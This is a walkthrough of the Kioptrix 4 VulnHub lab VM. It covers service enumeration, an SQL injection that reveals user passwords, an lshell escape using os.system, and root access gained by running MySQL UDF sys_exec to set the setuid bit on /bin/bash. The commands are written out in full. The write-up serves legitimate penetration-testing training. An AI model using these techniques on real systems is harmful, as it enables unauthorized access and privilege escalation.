Kioptrix 4 Write-Up
To prepare for OSCP1 I’m planning to do a whole bunch of VulnHub VMs and other challenges. Doing these VMs and creating write-ups should give a good amount of practice before I start with the actual PWK1 course.
Kioptrix 4
The Kioptrix series consist of multiple beginner boot2root VMs with multiple ways to gain a root shell2.
Setup
I’m using VMware with two VMs: Kali 2017.1 and Kioptrix 4.
Scanning & Enumeration
After finding the IP of the kioptrix VM it’s possible to perform the usual Nmap scan to get a quick overview of what is running on the VM:
root@vm-kali:~# nmap -T4 -sV 172.16.45.136
Starting Nmap 7.40 ( https://nmap.org ) at 2017-09-04 18:35 MDT
Nmap scan report for 172.16.45.136
Host is up (0.00013s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:BE:BD:DA (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.98 seconds
Additionally Enum4Linux or RPCClient can be used to find more information such as usernames or software version numbers. Sadly the resulting information did not get me anywhere interesting except for providing a short list of usernames.
root@vm-kali:~# rpcclient -U "" 172.16.45.136
Enter 's password:
rpcclient $> enumdomusers
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
rpcclient $> netshareenum
rpcclient $> netshareenumall
netname: print$
remark: Printer Drivers
path: C:\var\lib\samba\printers
password:
netname: IPC$
remark: IPC Service (Kioptrix4 server (Samba, Ubuntu))
path: C:\tmp
password:
rpcclient $>
root@vm-kali:~/Documents/vulnhub# enum4linux 172.16.45.136
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Sep 4 18:47:02 2017
--snip--
=======================================
| OS information on 172.16.45.136 |
=======================================
[+] Got OS info for 172.16.45.136 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Got OS info for 172.16.45.136 from srvinfo:
KIOPTRIX4 Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id : 500
os version : 4.9
server type : 0x809a03
==============================
| Users on 172.16.45.136 |
==============================
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
==========================================
| Share Enumeration on 172.16.45.136 |
==========================================
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
--snip--
enum4linux complete on Mon Sep 4 18:47:27 2017
Web Vulnerabilities
On the website it’s possible to perform some file inclusions and SQL injections that appear to work, but didn’t seem to lead anywhere… After a bit of thinking I ran dirbuster and finally used the usernames that were found in combination with the SQL injection, and this led to the passwords of a couple of users.
The dirbuster results:
root@vm-kali:~# dirb http://172.16.45.136
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Sep 4 19:04:08 2017
URL_BASE: http://172.16.45.136/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.45.136/ ----
+ http://172.16.45.136/cgi-bin/ (CODE:403|SIZE:328)
==> DIRECTORY: http://172.16.45.136/images/
+ http://172.16.45.136/index (CODE:200|SIZE:1255)
+ http://172.16.45.136/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://172.16.45.136/john/
+ http://172.16.45.136/logout (CODE:302|SIZE:0)
+ http://172.16.45.136/member (CODE:302|SIZE:220)
+ http://172.16.45.136/server-status (CODE:403|SIZE:333)
---- Entering directory: http://172.16.45.136/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.45.136/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Sep 4 19:04:10 2017
DOWNLOADED: 4612 - FOUND: 6
Results from the SQL injections when using the actual usernames:
http://172.16.45.136/member.php?username=john
Username : john
Password : MyNameIsJohn
Logged out, logged back in with SQLi and user robert:
http://172.16.45.136/member.php?username=robert
Username : robert
Password : ADGAdsafdfwt4gadfga==
Basic Shell
Looking back at the Nmap scan we know that there is an SSH server running, and it appears that we can use the found credentials to log in! The downside was that it gave a restricted shell:
john:~$ ? help
Limited Shell (lshell) limited help.
Cheers.
With some easy Google searches you can figure out that the lshell is made in python and can be escaped quite easily3:
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$
Privilege Escalation
Now with a normal shell, one of the first things to do is test if GCC is installed. It is not, this means that the privilege escalation will most likely not be an exploit.
john@Kioptrix4:~$ gcc
The program 'gcc' can be found in the following packages:
* gcc
* pentium-builder
Ask your administrator to install one of them
bash: gcc: command not found
So what else… Maybe there are services that run as root and can be abused to gain better privileges?
john@Kioptrix4:~$ ps aux | grep root
--snip--
root 4732 0.0 0.0 1872 540 ? S 14:26 0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root 4753 0.0 0.0 5316 988 ? Ss 14:26 0:00 /usr/sbin/sshd
root 4809 0.0 0.0 1772 528 ? S 14:26 0:00 /bin/sh /usr/bin/mysqld_safe
root 4851 0.0 1.5 127120 16516 ? Sl 14:26 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-fi
root 4853 0.0 0.0 1700 556 ? S 14:26 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root 4926 0.0 0.1 6532 1344 ? Ss 14:26 0:00 /usr/sbin/nmbd -D
root 4928 0.0 0.2 10108 2544 ? Ss 14:26 0:00 /usr/sbin/smbd -D
root 4939 0.0 0.0 10108 1028 ? S 14:26 0:00 /usr/sbin/smbd -D
root 4943 0.0 0.1 8084 1340 ? Ss 14:26 0:00 /usr/sbin/winbindd
root 4945 0.0 0.1 8208 1700 ? S 14:26 0:00 /usr/sbin/winbindd
root 4975 0.0 0.0 2104 888 ? Ss 14:26 0:00 /usr/sbin/cron
root 4997 0.0 0.5 20464 6188 ? Ss 14:26 0:00 /usr/sbin/apache2 -k start
root 5053 0.0 0.0 1716 488 tty1 Ss+ 14:27 0:00 /sbin/getty 38400 tty1
root 5079 0.0 0.0 8084 872 ? S 14:42 0:00 /usr/sbin/winbindd
root 5080 0.0 0.1 8092 1268 ? S 14:42 0:00 /usr/sbin/winbindd
root 5742 0.0 0.3 11360 3720 ? Ss 18:26 0:00 sshd: john [priv]
john 6535 0.0 0.0 3004 752 pts/0 R+ 21:51 0:00 grep root
Wait, is mysql running as root? That might have some potential. It took me a bit of time to figure out what I had to do. What finally helped me was an article that was talking about a special MySQL library4. Initially I figured that this wouldn’t work as it’s not possible to compile the library, but I was in luck, the library is already on the system.
john@Kioptrix4:~$ locate mysqludf
/usr/lib/lib_mysqludf_sys.so
mysql> set @status := sys_exec('echo "hello im root" > /tmp/helloworld');
Query OK, 0 rows affected (0.00 sec)
mysql> select @status
-> ;
+---------+
| @status |
+---------+
| NULL |
+---------+
1 row in set (0.00 sec)
mysql> !\ bash
ERROR:
Unknown command '\ '.
-> \! bash
john@Kioptrix4:~$ ls /tmp
helloworld
john@Kioptrix4:~$ cat /tmp/helloworld
cat: /tmp/helloworld: Permission denied
john@Kioptrix4:~$ ls -al /tmp/
total 16
drwxrwxrwt 3 root root 4096 2017-09-04 22:26 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw-rw---- 1 root root 14 2017-09-04 22:26 helloworld
The following can be done to get root. It’s not the cleanest way, but it did work.
mysql> set @status := sys_exec('chmod g+s /bin/bash');
Query OK, 0 rows affected (0.00 sec)
mysql> set @status := sys_exec('chmod u+s /bin/bash');
Query OK, 0 rows affected (0.00 sec)
mysql> \! bash
bash-3.2$ id
uid=1001(john) gid=1001(john) groups=1001(john)
bash-3.2$ ls -al /bin/bash
-rwsrwsrwx 1 root root 702160 2008-05-12 14:33 /bin/bash
bash-3.2$ /bin/bash -p
bash-3.2# id
uid=1001(john) gid=1001(john) euid=0(root) egid=0(root) groups=1001(john)
bash-3.2# cat /tmp/
Additional Notes / Lessons Learned
All in all I really enjoyed the VM, mainly because the different VMs show different ways to find information and exploit vulnerabilities. Especially the variety in ways to achieve privilege escalation are interesting to play around with.